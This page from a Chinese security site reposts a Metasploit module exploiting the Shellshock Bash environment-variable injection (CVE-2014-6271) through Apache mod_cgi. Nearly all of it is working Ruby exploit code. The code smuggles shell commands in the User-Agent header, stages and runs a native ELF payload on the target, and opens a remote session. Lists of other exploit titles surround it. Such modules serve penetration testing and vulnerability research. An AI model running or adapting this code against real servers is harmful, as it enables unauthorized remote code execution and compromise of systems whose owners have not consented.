首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache mod_cgi Bash Environment Variable Code Injection Exploit
来源:metasploit.com 作者:wvu 发布时间:2014-09-28  
##
# This module requires Metasploit: http//metasploit.com/download
##
  
require 'msf/core'
  
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Original Metasploit aux module
        'juan vazquez' # Allow wvu's module to get native sessions
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
  
    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end
  
  def check
    res = req("echo #{marker}")
  
    if res && res.body.include?(marker * 3)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
  
  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end
  
    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
  
    # A last chance after the cmdstager
    # Trying to make it generic
    unless session_created?
      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
    end
  end
  
  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
  
    req(cmd)
  end
  
  def req(cmd)
    send_request_cgi(
      {
        'method' => datastore['METHOD'],
        'uri' => normalize_uri(target_uri.path.to_s),
        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
      }, datastore['TIMEOUT'])
  end
  
  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DHCP Client Bash Environment V
·Perl 5.20.1 Deep Recursion Sta
·Gnu Bash 4.3 CGI Scan Remote C
·Mac OS X VMWare Fusion Root Pr
·Gnu Bash 4.3 CGI REFERER Comma
·Nucom ADSL ADSLR5000UN ISP Cre
·Dhclient Bash Environment Vari
·GNU bash Environment Variable
·bash代码注入的安全漏洞
·GNU bash Environment Variable
·Microsoft Exchange IIS HTTP In
·Internet Explorer 8 - Fixed Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved